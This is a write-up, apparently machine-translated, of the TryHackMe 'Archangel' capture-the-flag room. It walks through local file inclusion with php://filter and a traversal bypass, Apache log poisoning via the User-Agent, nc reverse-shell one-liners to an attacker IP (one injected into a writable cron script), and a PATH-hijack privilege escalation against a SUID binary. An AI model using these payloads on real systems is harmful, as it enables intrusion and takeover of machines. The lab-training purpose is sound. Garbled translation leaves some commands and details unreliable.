disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
The discovery service
Chrysene ─(root💀kali)-[~/tryhackme/Archangel] ├ ─# nmap-sv-pn 10.10.228.134 Host discovery disabled (-pn). All addresses will Be marked 'up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2021-10-29 05:43 EDT Nmap scan Report for 10.10.228.134 Host is up (0.32s latency). Not shown: 998 Closed ports PORT STATE SERVICE VERSION 22/ TCP open SSH OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; Protocol 2.0) 80/ TCP open HTTP Apache HTTPD 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 17.39 secondsCopy the codePermeate port 80
Blasting directory
┌ ─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.228.134. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.228.134 / _21-10-29 _06-02-36. TXT the Error Log: / root/dirsearch _06 / logs/errors - 21-10-29-02-36. The log Target: http://10.10.228.134/ [06:02:37] Starting: [06:03:59] - 312 - b - 301 / flags - > http://10.10.228.134/flags/ [06:04:06] - 313 - b - 301 / images - > http://10.10.228.134/images/ [06:04:06] 200-0 b - / images / [06:04:08] 200-19 KB - / index. HTML [06:04:29] - 312 - b - 301 / pages - > http://10.10.228.134/pages/ [06:04:30] 200-0 b - / pages / [06:04:44] - 277 - b - 403 / server - the statusCopy the code/flags turns to YouTube for a video, no other information, it should be a rabbit hole and no other information for other folders
THM = mafialive.thm = mafialive.thm = mafialive.thm = mafialive.thm = mafialive.thm = mafialive.thm
Echo "10.10.228.134 mafialive. THM ">> /etc/hosts
Open mafialive. THM to find Flag1
Reblast catalog
┌ ─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://mafialive.thm. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log Target: http://mafialive.thm/ [06:52:01] Starting: [06:53:22] 200 - 59B - /index.html [06:53:50] 200 - 34B - /robots.txt [06:54:02] 200 - 286B - /test.phpCopy the codeOpen test.php and click the webpage butTom. The URL shows a string of paths. Modify the file name of the path to access the contents of some files on the server, indicating the existence of LFI vulnerability
We use PHP pseudo protocol to output the entire web page source code, payloadr as follows
/test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.phpCopy the codePrint out the source code for test.php and take it to Flag2
Review the upload code
<? php function containsStr($str, $substr) { return strpos($str, $substr) ! == false; } if(isset($_GET["view"])){ if(! containsStr($_GET['view'], '.. /.. ') && containsStr($_GET['view'], '/var/www/html/development_testing')) { include $_GET['view']; }else{ echo 'Sorry, Thats not allowed'; }? >Copy the codeOnly satisfaction does not appear.. /.. And must appear/var/WWW/HTML/development_testing that under the condition of two strings, contains the logic and will only take effect
We can get around this by using // instead of /. /.. Read /etc/passwdpayload as follows
/test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/.. / /.. / /.. / /.. //etc/passwdCopy the codeDecrypt it and get the username
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash
Copy the codeThe SSH of archangel has been exploded. The SSH of archangel has not been exploded
Here after testing, get apache access. Log path
/test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/.. / /.. / /.. / /.. //var/log/apache2/access.logCopy the codeAnalysis of the
Apache 2.4-2.9 has a file parsing vulnerability. With LFI, we can write the payload into the log and then access the log file on the web page. Then the bounce shell can be triggered
First, let’s look at normal logging like this:
[02/Nov/ 201:14:14:38 +0530] "GET /test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/.. / /.. / /.. / /.. /etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; The rv: 78.0) Gecko / 20100101 Firefox / 78.0"Copy the codeApache records the URL access path and user-Agent information
Then we can write the PHP code to the user-agent. For example, we can expect something like this:
[02/Nov/ 201:14:14:38 +0530] "GET /test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/.. / /.. / /.. / /.. //etc/passwd http/1.1 "200 1277 "-" "< PHP phpinfo(); ? >"Copy the codeThen access the log in your browser
If the PHP version information can be displayed on the webpage at this time, it means that our PHP code can execute normally
attack
Payload = payload = payload = payload = payload = payload = payload = payload
GET /test.php? view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/.. / /.. / /.. / /.. / / var/log/apache2 / access log HTTP / 1.1 Host: mafialive. THM the user-agent: "<? php exec('rm /tmp/f; mkfifo /tmp/f; Cat/TMP/f | / bin/sh -i 2 > &1 | nc 10.13.21.169 4444 > / TMP/f ')? >" Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/webp, * / *; Q = 0.8 Accept - Language: en - US, en. Q =0.5 accept-encoding: gzip, deflate Connection: close upgrade-insecure -Requests: 1Copy the codeOpen to monitor
nc -lnvp 4444
The trigger
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.. / /.. / /.. / /.. //var/log/apache2/access.logCopy the codeThe rebound shell was received. Procedure
└─ (root💀kali)-[~/tryhackme/Archangel] ├ ─# nc-lnVP 4455 listening on [any] 4455... Connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 54296 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $ ls index.html mrrobot.php robots.txt test.php $ cd /home $ ls archangel $ cd archangel $ ls myfiles secret user.txtCopy the codeI got the same folder as user.txt, the secret file has no read permission, and the myFiles folder contains a password file, which is again the YouTube don’t Give up (aka: I’m laughing at you) video
The right to the archangel
Linpeas discovered that there is a scheduled task for Archangel and the file is still writable
www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh cat /opt/helloworld.sh #! /bin/bash echo "hello world" >> /opt/backupfiles/helloworld.txt www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh ls -alh /opt/helloworld.sh -rwxrwxrwx 1 archangel archangel 66 Nov 20 2020 /opt/helloworld.shCopy the codeWrite a shell to a scheduled task
echo "rm /tmp/f; mkfifo /tmp/f; Cat/TMP/f | / bin/sh -i 2 > &1 | nc 10.13.21.169 4242 > / TMP/f "> > / opt/helloworld. ShCopy the codeThe rebound shell was received. Procedure
└─ (root💀kali)-[~/tryhackme/Archangel] ├ ─# nc - LNVP 462 listening on [any] 462... Connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 37592 /bin/sh: 0: can't access tty; job control turned off $ whoami archangel $ id uid=1001(archangel) gid=1001(archangel) groups=1001(archangel) $Copy the codeGet the second user.txt in /home/archangel/secret
Right to mention
There is a backup file in the same folder with SUID permission, downloaded to the target computer and analyzed with strings command, and found that there is a shell fragment:
Chrysene ─(root💀kali)-[~/tryhackme/Archangel] ├ ─# strings backup /lib64/ lD-linux-x86-62.so.2 setuid system __cxa_finalize Setgid __libc_start_main libc.so.6 glibc_2.5_ITM_deregistertmclonetable __gmon_STARt__ _ITM_registerTMCloneTable u+UH []A\A]A^A_ cp /home/user/archangel/myfiles/* /opt/backupfilesCopy the codeAnalysis of the
Let’s look at the top line of shell code
cp /home/user/archangel/myfiles/* /opt/backupfiles
Copy the codeCode itself is said to/home/user/archangel/myfiles by cp command copies the contents of / * to/opt/backupfiles
We know that the SUID file is a file that ordinary users can run as root. The cp in this file is a command issued by ordinary users, but it is run as root, which means that if we can hijack the command and rewrite its content, we can use it to claim rights.
In Linux, all user commands are stored in the user’s $PATH environment variable. When we type one command after another at the terminal, the Linux server will check the current user’s environment variable PATH for the command. If the binary file exists, run the command. If the binary file does not exist, command not found is displayed.
Started to ask right
View the current user’s environment variable $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Copy the codeAdd the home directory /home/archangel to the environment variable $PATH
archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
echo $PATH
/home/archangel:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Copy the codeCreate a cp file under the newly added $PATH and grant execute permission
archangel@ubuntu:~$ touch cp
touch cp
archangel@ubuntu:~$ chmod +x cp
chmod +x cp
Copy the codeAdd the following code to the new CP file
#! /bin/bash bash -pCopy the codeView cp file
archangel@ubuntu:~$ cat cp cat cp #! /bin/bash bash -pCopy the codeIf everything is ready, execute SUID file backup and raise authority to root
archangel@ubuntu:~/secret$ ./backup
./backup
root@ubuntu:~/secret# id
id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
whoami
root
root@ubuntu:~/secret# cat /root/root.txt
cat /root/root.txt
Copy the codeconclusion
Wonderful target aircraft, learned a lot of new knowledge. LFI generally holds the shell in two positions:
-
LFI+ Upload file getShell
-
LFI+ file parsing vulnerability GetShell
This article uses the second one. For the first method, I have a record on this target
In terms of weight lifting, the environment variable $PATH is modified. This weight lifting method needs to be combined with SUID. This article modifies the cp command, but other commands may also be modified. Such as MV, TAR, etc., depending on the specific situation of the target aircraft.